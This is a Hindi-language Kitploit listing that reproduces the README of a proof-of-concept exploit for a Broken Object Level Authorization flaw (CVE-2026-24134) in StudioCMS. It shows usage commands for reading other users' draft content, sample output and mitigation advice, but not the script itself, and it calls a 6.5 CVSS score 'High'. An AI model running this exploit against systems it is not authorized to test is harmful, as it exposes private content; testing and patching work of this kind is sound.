Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24134-PoC — CVE-2026-24134 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो StudioCMS में एक Broken Object Level Authorization भेद्यता है, जो ड्राफ्ट सामग्री तक अनधिकृत पहुंच को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/filipegaudard/cve-2026-24134-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

CVE-2026-24134 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो StudioCMS में एक Broken Object Level Authorization भेद्यता है, जो ड्राफ्ट सामग्री तक अनधिकृत पहुंच को प्रदर्शित करता है।

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24134-PoC

अवलोकन

इस रिपॉजिटरी में CVE-2026-24134 के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो StudioCMS में एक ब्रोकन ऑब्जेक्ट लेवल ऑथराइज़ेशन (BOLA) भेद्यता है।

सामग्री

  • cve_2026_24134_poc.py - पायथन शोषण स्क्रिप्ट

पूर्वापेक्षाएँ

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

त्वरित प्रारंभ

मैनुअल शोषण

root@kitploit:~
# मूल उपयोग
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# आउटपुट को फ़ाइल में सहेजें
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

स्वचालित परीक्षण

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

तर्क

आवश्यक

  • -u, --url - लक्षित StudioCMS आधार URL
  • --uuid - लक्षित ड्राफ्ट सामग्री UUID

मैनुअल मोड

  • --username - प्रमाणीकरण के लिए उपयोगकर्ता नाम
  • --password - प्रमाणीकरण के लिए पासवर्ड

स्वचालित परीक्षण मोड

  • --auto-test - स्वचालित परीक्षण सक्षम करें
  • --visitor-user - विज़िटर खाता उपयोगकर्ता नाम
  • --visitor-pass - विज़िटर खाता पासवर्ड
  • --editor-user - संपादक खाता उपयोगकर्ता नाम
  • --editor-pass - संपादक खाता पासवर्ड

वैकल्पिक

  • --save - प्रतिक्रिया सामग्री को फ़ाइल में सहेजें
  • --no-ssl-verify - SSL प्रमाणपत्र सत्यापन अक्षम करें

उदाहरण परिदृश्य

परिदृश्य 1: जाँचें कि सिस्टम भेद्य है या नहीं

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

यदि भेद्य है तो अपेक्षित आउटपुट:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

यदि पैच किया गया है तो अपेक्षित आउटपुट:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

परिदृश्य 2: ड्राफ्ट सामग्री निकालें

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

यह पूरी ड्राफ्ट सामग्री को draft_{uuid}.html में सहेज देगा।

आउटपुट को समझना

सफलता संकेतक

  • [+] - सफल संचालन (हरा)
  • [*] - सूचनात्मक संदेश (नीला)
  • [!] - चेतावनी (पीला)
  • [-] - त्रुटि (लाल)

HTTP स्थिति कोड

  • 200 OK - भेद्य! ड्राफ्ट सामग्री तक पहुँच प्राप्त हुई
  • 403 Forbidden - पैच किया गया! उचित प्राधिकरण लागू है
  • 404 Not Found - UUID अमान्य या सुरक्षित कार्यान्वयन (अस्तित्व प्रकट करने के बजाय 404 लौटाता है)
  • 401 Unauthorized - प्रमाणीकरण विफल

शमन

यदि आप StudioCMS का भेद्य संस्करण चला रहे हैं, तो तुरंत पैच किए गए संस्करण में अपडेट करें।

डेवलपर्स के लिए

वास्तविक समस्या: प्राधिकरण जाँच क्लाइंट-साइड (JavaScript) पर की गई थी, सर्वर-साइड पर नहीं।

विकास टीम के अनुसार:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

समाधान: प्राधिकरण को क्लाइंट से सर्वर पर स्थानांतरित करें।

मुख्य सिद्धांत: क्लाइंट पर कभी भरोसा न करें। क्लाइंट-साइड सुरक्षा = UX संवर्धन। सर्वर-साइड सुरक्षा = वास्तविक सुरक्षा।

कानूनी अस्वीकरण

महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन प्रणालियों के विरुद्ध उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • अनधिकृत पहुँच अधिकांश न्यायक्षेत्रों में अवैध है
  • लेखक इस उपकरण के दुरुपयोग के लिए कोई दायित्व नहीं मानता है
  • हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

संदर्भ

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

संपर्क

इस PoC या भेद्यता के बारे में प्रश्नों के लिए:

  • लेखक: Filipe Gaudard

लाइसेंस

यह PoC शैक्षिक उद्देश्यों के लिए जारी किया गया है। जिम्मेदारी और नैतिकता से उपयोग करें।

टूल डाउनलोड करें